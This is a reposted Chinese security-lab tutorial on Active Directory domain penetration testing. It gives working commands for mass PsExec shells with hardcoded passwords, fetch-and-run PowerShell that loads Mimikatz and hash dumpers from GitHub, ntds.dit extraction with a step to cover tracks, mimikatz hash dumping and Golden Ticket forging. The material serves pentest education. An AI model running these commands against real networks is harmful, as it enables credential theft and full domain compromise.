乾貨!內網滲透測試之域滲透詳解!收藏!

2021-01-10 中國軟體網
在滲透測試過程中,我們經常會遇到以下場景:某處於域中的伺服器通過路由做埠映射,對外提供web服務,我們通過web腳本漏洞獲得了該主機的system權限,如果甲方有進一步的內網滲透測試需求,以證明企業所面臨的巨大風險,這個時候就需要做內網的域滲透。

通常,我們是以獲得域控制器的權限為目標,因為一旦域控制器淪陷,整個內網就盡在掌握中了,在學習域滲透之前,我們需要了解一些基礎知識,本期「安仔課堂」,ISEC實驗室為大家一一講解。

一、什麼是域

將網絡中多臺計算機邏輯上組織到一起,進行集中管理,這種區別於工作組的邏輯環境叫做域,域是組織與存儲資源的核心管理單元,在域中,至少有一臺域控制器,域控制器中保存著整個域的用戶帳號和安全資料庫。

圖1

那麼域網絡結構有什麼優點呢?域的優點主要有以下幾個方面:

1、權限管理比較集中,管理成本降低

域環境中,所有的網絡資源,包括用戶均是在域控制器上維護的,便於集中管理,所有用戶只要登入到域,均能在域內進行身份驗證,管理人員可以較好的管理計算機資源,管理網絡的成本大大降低;同時在域環境中也可以防止企業員工在域成員主機上違規安裝軟體,增強客戶端安全性,減少客戶端故障,降低維護成本。

2、保密性加強

有利於企業的一些保密資料的管理,可以單獨對資源進行權限控制,允許或拒絕特定的域帳戶對資源的請求。

3、安全性加強

使用漫遊帳戶和文件夾重定向,個人帳戶的工作文件及數據等可以存儲在伺服器上,進行統一備份及管理,使用戶的數據更加安全有保障;同時域控制器能夠分發應用程式、系統補丁,用戶可以選擇安裝,也可以由系統管理員指派自動安裝,數據及系統安全性大大提高。

4、提高了便捷性

可由管理員指派登陸腳本映射,用戶登錄後就可以像使用本地盤符一樣,使用網絡上的資源,且不需要再次輸入密碼。

基於以上原因,很多企業的內網均會採用域環境,所以作為一名合格的滲透測試人員,域滲透的常規思路和技巧要熟練掌握。

二、域的特性

域成員計算機在登錄的時候可以選擇登錄到域中或此計算機,登陸到域中的時候,身份驗證是採用Kerberos協議在域控制器上進行的,登陸到此計算機則是通過SAM來進行NTLM驗證的,如下圖:

圖2

默認情況下,域用戶可以登錄到域中所有的工作站,不包括域控制器,管理員也可以指定具體的計算機,域用戶信息保存在活動目錄中,如下圖:

圖3

三、域滲透思路

一個具有一定規模的企業,每天都可能面臨員工入職和離職,因此網絡管理部門經常需要對域成員主機進行格式化消除磁碟的文件,然後重裝系統及軟體,以提供給新員工使用;因此,為了便於後期交接,大多網絡管理員會做好一個系統鏡像盤,統一安裝所有的電腦,並且在安裝的時候設置慣用、甚至統一的密碼。

因此,域中的計算機本地管理員帳號,極有可能能夠登陸域中較多的計算機,本地管理員的密碼在伺服器上後期修改的概率,遠低於在個人辦公電腦上的概率,而域用戶權限是較低的,是無法在域成員主機上安裝軟體的,這將會發生下面的一幕:

某個域用戶需要使用viso軟體進行繪圖操作,於是聯繫網絡管理員進行安裝,網絡管理員採用域管理員身份登錄了域成員主機,並幫助其安裝了viso軟體,於是這個有計算機基礎的員工,切換身份登錄到了本地計算機的管理員,後執行mimikatz,從內存當中抓取了域管理員的密碼,便成功的控制了整個域。

因此,域滲透的思路就是:通過域成員主機,定位出域控制器IP及域管理員帳號,利用域成員主機作為跳板,擴大滲透範圍,利用域管理員可以登陸域中任何成員主機的特性,定位出域管理員登陸過的主機IP,設法從域成員主機內存中dump出域管理員密碼,進而拿下域控制器、滲透整個內網。

四、域滲透常用指令

以下所有指令均為在域成員主機上執行的結果。

得到域控制器的IP:dsquery server

圖4

得到域控制器主機名:net group "domain controllers" /domain,注意通過該指令得到的機器名後面會多一個$符號,如下圖:

圖5

查詢域管理用戶:net group "domain admins" /domain

圖6

查看所有域用戶: net user /domain

圖7

這裡有一個特殊用戶叫做krbtgt,該用戶是用於Kerberos身份驗證的帳戶,獲得了該用戶的hash,就可以偽造票據進行票據傳遞攻擊了,此外,還有以下幾個常用指令:

查詢當前登陸域:net config workstation

查詢域密碼策略:net accounts /domain

查看補丁信息:wmic qfe

查看作業系統類型:wmic os

當我們獲得了某個本地管理員權限的帳號,我們想通過該帳號訪問內網其他主機,常用的做法有net use建立Ipc$連接、wmic指令連接、採用rdp方式連接、當然也可以使用「計算機管理--連接到另一臺計算機」的功能來進行操作,除此之外,筆者更喜歡使用psexec進行遠程連接,如下圖:

圖8

如果覺得一臺一臺手工連接比較麻煩,也可以進行批量連接,批量反彈cmdshell回來,可以採用如下批處理:

@echo off

echo check ip addr config file...

if not exist ip.txt echo ip addr config file ip.txt does not exist! & goto end

echo read and analysis file...

for /F "eol=#" %%i in (ip.txt) do start PsExec.exe \%%i -accepteula -u administrator -p "123456" cmd & start cmd /c PsExec.exe \%%i -u administrator -p "123456" cmd

:end

exit

圖9

當返回了cmdshell後,我們就可以逐一讀取內存,去抓取域管理員的密碼,這裡可以結合powershell來進行快速操作,無需上傳文件:

抓明文:

powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz –DumpCerts

抓hash:

powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Gather/Get-PassHashes.ps1');Get-PassHashes

這種方式的好處是只要域管理員登陸過目標計算機,即使註銷了會話,一樣可以從內存讀取到密碼,但實際的滲透過程中,我們往往追求的是效率,如何快速找到域管理員登陸過哪臺計算機,並且還存在活動會話,優先級更高一些,我們可以使用如下指令:

圖10

這裡ip.txt是需要遍歷的IP列表,1.bat中的指令為tasklist /v |find 「域管理員」,這樣我們只需要在返回的cmdshell當中,去查看是否含有域管理員字樣的會話,如果有,則表示該主機上曾經登陸過域管理員,可以去dump內存密碼了。

另外我們也可以使用Tasklist命令查看遠程主機任務列表,這裡一樣是搜索含有域管理員字樣的任務列表,如下圖:

圖11

基於以上原理,我們可以寫一個更加自動化的批處理:

@echo off

echo check ip addr config file...

if not exist ip.txt echo ip addr config file ip.txt does not exist! & goto end

echo read and analysis file...

for /F "eol=#" %%i in (ip.txt) do echo %%i &(echo %%i &tasklist /s %%i /u administrator /p mytest2010 /v) >>d: esult.txt

:end

exit

上述指令的作用就是採用指定的用戶名和密碼去遍歷ip.txt中的IP列表,並列印任務列表,將結果輸出到result.txt當中,執行完了上述批處理,我們只需要稍作等待,最後去查看result.txt當中是否含有域管理員字樣,即可確定哪些主機上存在域管理員的活動會話,如下圖:

圖12

五、域用戶hash提取

域用戶帳戶以域資料庫的形式保存在活動目錄中,ntdsutil.exe是域控制器自帶的域資料庫管理工具,從windows 2008就默認自帶了,因此我們可以通過域資料庫,提取出域中所有的域用戶信息,在域控上依次執行如下命令,導出域資料庫:

Ntdsutil –snapshot—activate instance ntds—create—mount {guid}—copy 裝載點windowsNTDS tds.dit d: tds_save.dit

圖13

域資料庫裝載完畢,即可進行複製,如下圖:

圖14

最後執行unmount {guid}—delete {guid}--quit刪除裝載點即可,避免被發現,接著上傳工具QuarksPwDump到域控制器上,然後執行如下命令,成功提取用戶hash,如下圖:

QuarksPwDump --dump-hash-domain --ntds-file d: tds_save.dit

圖15

注意上面的操作必須在域控制器上,否則會出現如下錯誤,這是因為打開域資料庫需要用到相應的資料庫引擎,如下圖:

圖16

除了上面的操作方法外,還可以使用mimikatz一條命令,獲取域控制器上所有用戶的hash:

mimikatz log "privilege::debug" "lsadump::lsa /patch"

圖17

六、票據傳遞攻擊

域中每個用戶的Ticket都是由krbtgt的密碼Hash來計算生成的,因此只要我們拿到了krbtgt的密碼Hash,就可以隨意偽造Ticket,進而使用Ticket登陸域控制器,使用krbtgt用戶hash生成的票據被稱為Golden Ticket,此類攻擊方法被稱為票據傳遞攻擊。

首先,我們來生成Golden Ticket,這裡需要修改相應的域管理員帳號、域名稱、sid值,如下圖:

圖18

接著我們使用如下指令導入票據:

圖19

導入成功後,我們在域成員主機上執行klist,即可查看緩存的票據,如下圖:

圖20

最後,我們就可以使用票據傳遞攻擊,登陸域控了,如下圖:

圖21

因此,在域滲透過程如果發現域管理員的密碼已經修改,可嘗試利用krbtgt用戶的歷史hash來進行票據傳遞攻擊,krbtgt用戶的密碼一般不會有人去修改。

此外,域滲透過程中可能會使用到MS14-068這個漏洞,微軟給出的補丁是kb3011780,在server 2000以上的域控中,如果沒有打這個補丁,那麼情況將比較糟糕,利用該漏洞可以將任何一個域用戶提權至域管理員權限,危害極大。

廈門安勝網絡科技有限公司是廈門市美亞柏科控股子公司,秉承「創新為安,服務致勝」的經營理念,專注於網絡安全類產品的生產與服務;以「研發+服務+銷售」的經營模式,「裝備+平臺+服務」的產品體系,在技術研究、研發創新、產品化等方面已形成一套完整的流程化體系,為廣大用戶提供量體裁衣的綜合解決方案!

ISEC實驗室作為公司新技術和新產品的預研基地,秉承「我的安全,我做主」的理念,專注於網絡安全領域前沿技術研究,提供網絡安全培訓、應急響應、安全檢測等服務。

2018年

承擔全國兩會網絡安全保障工作。

2017年

承擔全國兩會網絡安全保障工作;

完成金磚「廈門會晤」保障工作;

完成北京「一帶一路」國際合作高峰論壇網絡安全保障;

承擔中國共產黨第十九次全國代表大會網絡安全保障。

承擔第四屆世界網際網路大會。

2016年

承擔全國兩會網絡安全保障工作;

為貴陽大數據與網絡安全攻防演練提供技術支持;

承擔G20峰會的網絡安保工作;

承擔第三屆世界網際網路大會。

2015年

承擔第二屆世界網際網路大會。

不忘初心、砥礪前行;未來,我們將繼續堅守、不懈追求,為國家網絡安全事業保駕護航!




免責聲明:

本站系本網編輯轉載,會儘可能註明出處,但不排除無法註明來源的情況,轉載目的在於傳遞更多信息,並不代表本網贊同其觀點和對其真實性負責。如涉及作品內容、版權和其它問題,請在30日內與本網聯繫, 來信: liujun@soft6.com 我們將在收到郵件後第一時間刪除內容!

[聲明]本站文章版權歸原作者所有,內容為作者個人觀點,不代表本網站的觀點和對其真實性負責,本站擁有對此聲明的最終解釋權。

相關焦點

  • 內網滲透|ATT&CK紅隊評估實戰靶場-2
    ,通過收集的信息已經確定了域控ip,和大致能描繪出內網基本拓撲圖,如上期所說,此靶場難度為易,非常適合練習內網滲透各種姿勢!在上篇中,通過CS的會話net view功能,探測出內網存活主機如下,確定了域控IP為192.168.52.138。那麼此時就已經本次滲透測試結束了,有了域控帳號密碼還有其ip,當然這就是靶場的特殊性所在,練習為主。實戰很難有這麼順利。這裡就引出我們第一種方法,可以進行CS的psexec模塊進行登錄。
  • 詳解雲計算之雲滲透測試
    打開APP 詳解雲計算之雲滲透測試 鄒錚 發表於 2021-01-11 15:38:59 雲計算從根本上改變了信息安全的很多方面
  • 360:新勒索病毒可在內網自動滲透 國內已經出現
    它不僅使用了NSA「永恆之藍」等黑客武器攻擊系統漏洞,還會利用「管理員共享」功能在內網自動滲透。在歐洲國家重災區,新病毒變種的傳播速度達到每10分鐘感染5000餘臺電腦,多家運營商、石油公司、零售商、機場、ATM機等企業和公共設施已大量淪陷,甚至烏克蘭副總理的電腦也遭到感染。
  • CSRF滲透測試 防禦與安全檢測手法剖析
    上一節講到了滲透測試中xss跨站攻擊檢測方法和防護,這一節也是關於跨站攻擊的另一個手法CSRF,很多客戶找到我們Sinesafe想要了解更多的跨站攻擊檢測方法以及防禦此類攻擊的辦法,想要讓網站的安全性更加堅固,對此提醒大家滲透測試網站必須要拿到授權才能測試哦!3.3.1.
  • 手把手教你如何用MSF進行後滲透測試!
    在對目標進行滲透測試的時候,通常情況下,我們首先獲得的是一臺web伺服器的webshell或者反彈shell,如果權限比較低,則需要進行權限提升;後續需要對系統進行全面的分析,搞清楚系統的用途;如果目標處於一個內網環境中,那麼我們就需要通過它對內網的其它終端進行信息收集和滲透測試,更全面地挖掘系統中存在的安全隱患。
  • 反滲透設備試運行詳解
    在大型反滲透系統中,應首先檢查設備中配置的電動慢開閥是否能自動按程序開啟與關閉。2、當系統有原水供給泵為反滲透系統供水時,應首先以低壓、低流量對反滲透設備進行排氣和衝洗。若系統沒有單獨設置給水泵,則可利用系統所供給的原水低壓衝洗膜內含有化學藥品的料液及空氣,衝洗時間控制在10~30分鐘之間。
  • 什麼是滲透測試?為什麼要給你您的行動應用程式執行滲透測試
    滲透測試對企業很重要,因為像銀行,投資銀行和股票交易交易所這樣的金融應用希望保證他們的數據高度安全,因此滲透測試對於確保安全性非常重要。如果行動應用程式遭到黑客攻擊,組織可以確定應用程式中是否存在任何威脅,以避免未來黑客入侵。主動滲透測試是防範黑客最好的保護措施。
  • 橫向滲透的常見方法
    在已經攻佔部分內網主機的前提下,利用現有的資源嘗試獲取更多的憑據、更高的權限,進而達到控制整個網段、擁有最高權限的目的。
  • RO反滲透裝置系統詳解
    北極星水處理網訊:RO反滲透脫鹽純淨水設備反滲透水處理設備作為純淨水過濾生產的專用設備,利用反滲透膜的選擇性透過原理,通過設備的高壓泵對經過反滲透膜的原水施加一定壓力,使原水中的水分子可以透過膜而滲析出來,而其他無機鹽、微生物與有機物等卻由於反滲透膜對這些物質的截留特性而不能透過膜,從而可以獲得純淨的無離子水。
  • 滲透測試服務之對瀏覽器開展攻擊
    其中最重要的就是滲透範圍,期望的目標和被攻擊的瀏覽器。一、避開同源策略。將SOP看作是瀏覽器的重要沙箱。若您可以避開它,那麼只需訪問另一個以前被瀏覽器封死的原始碼,就可以自動成功實施攻擊。繞過了SOP,接下來可用的一系列攻擊方法可以用於攻擊新出現的原始碼。將對SOP做一個深入的解釋。如果你繞過它,可以進行多種攻擊,而不會產生幹擾。
  • 7個用於開源網絡情報滲透測試工作的熱門OSINT工具
    我們將看一下Shodan的一些用例:測試「默認密碼」VNC查看器中的資產使用開放的RDP埠測試可用資產2、Google DorksGoogle Dorks從2002年開始出現,它以出色的性能提供了有效的結果。這個基於查詢的OSINT開源網絡情報工具的主要開發和創建是為了幫助用戶正確有效地定位索引或搜索結果。
  • RO反滲透淨水器詳解!
    RO反滲透淨水器是目前淨水市場的主流,目前國內90%的淨水品牌都是採用RO反滲透技術。那麼RO反滲透技術真的先進嗎?RO反滲透淨化後的水真的好嗎?在此,小編給大家詳細的剖析一下RO反滲透淨水器。其實RO反滲透淨水器的核心處理原件就是RO反滲透膜。RO反滲透的材料是PS聚碸材料,其材料本身是有很多弊端的。
  • 著色滲透探傷劑使用步驟
    工業生產或者生活中經常會用到的一種檢測缺陷的方法--著色滲透探傷,那怎麼使用著色探傷劑呢?
  • 近源滲透實操之一夜回到解放前
    有些小夥伴對於操作存在一些疑問,我把某些技術的詳解寫在下面。1 近源滲透測試它是一種集常規網絡攻防、物理接近、社會工程學及無線電通信攻防等能力於一體的高規格網絡安全評估行動。2 kali nethunter它是一款專為滲透測試人員打造的,基於安卓的滲透測試平臺。
  • 網站APP滲透測試越權漏洞介紹
    業務部門和安全部門在實踐安全測試時開展合作,早期測試人員和安全同學通過手工執行安全測試用例來發現問題,隨後慢慢地也開始使用一些安全工具,通過自動化的方式來提高發現問題的效率。同時,我們還關注了與業務密切相關的一個安全問題——界面越權問題,並試圖通過自動掃描來發現此類問題,從而提高效率。
  • 水處理技術簡史之反滲透
    他們還意外地發現,膜在測試時的朝向至關重要,其中一面朝向進料液的效果要顯著優於另一面。熱處理醋酸纖維素膜的鹽截留率達到了92%,水的滲透係數則達到了0.00095m3/m2·d·atm,遠高於其它薄膜。更為重要的是,他們由此認識到,膜結構上的不對稱性對膜性能影響重大,降低膜的有效厚度是關鍵。為了進一步提高膜的性能,兩位科學家決定自己制膜。
  • ROP-ROS信號通路調控植物滲透脅迫響應的新機制
    因此,ROP基因家族是滲透信號的潛在調節因子,但是目前尚不清楚ROP如何介導滲透脅迫下的ROS信號積累及其調節機制。進一步的研究表明,受到滲透刺激後數分鐘內,ROP6會在質膜聚集形成納米結構域,並且該結構域的ROP6幾乎不會擴散,這與其他質膜蛋白的表現不同,表明ROP6蛋白的特異性。該研究還通過改變ROP6蛋白的醯化及擴散特性,發現ROP6納米結構域的形成是激活細胞中滲透信號所必需的。
  • 反滲透膜,反滲透淨水器的「靈魂」部件!
    其中一款淨水設備就是家用反滲透淨水器,它憑著高精度的過濾,對原水進行深度的處理,深受消費者們的歡迎。都說一款淨水器最重要的部分就是濾芯,而家用反滲透淨水器的濾芯就是反滲透膜了,那麼有興趣的就一起來了解下反滲透膜吧。
  • 水處理技術剖析:反滲透計算公式詳解
    反滲透又稱逆滲透,一種以壓力差為推動力,從溶液中分離出溶劑的膜分離操作。因為它和自然滲透的方向相反,故稱反滲透。根據各種物料的不同滲透壓,就可以使用大於滲透壓的反滲透壓力,即反滲透法,達到分離、提取、純化和濃縮的目的。
  • 函數的三要素之定義域詳解
    一般函數的定義域和抽象函數的定義域詳解函數的三要素:定義域,值域和表達式,都是非常重要的內容,出題人會經常在此處做文章,大家一定要將這三塊內容學紮實了哦。本次課程我們結合出題人的意圖和相關的高考考點為大家講解函數的定義域。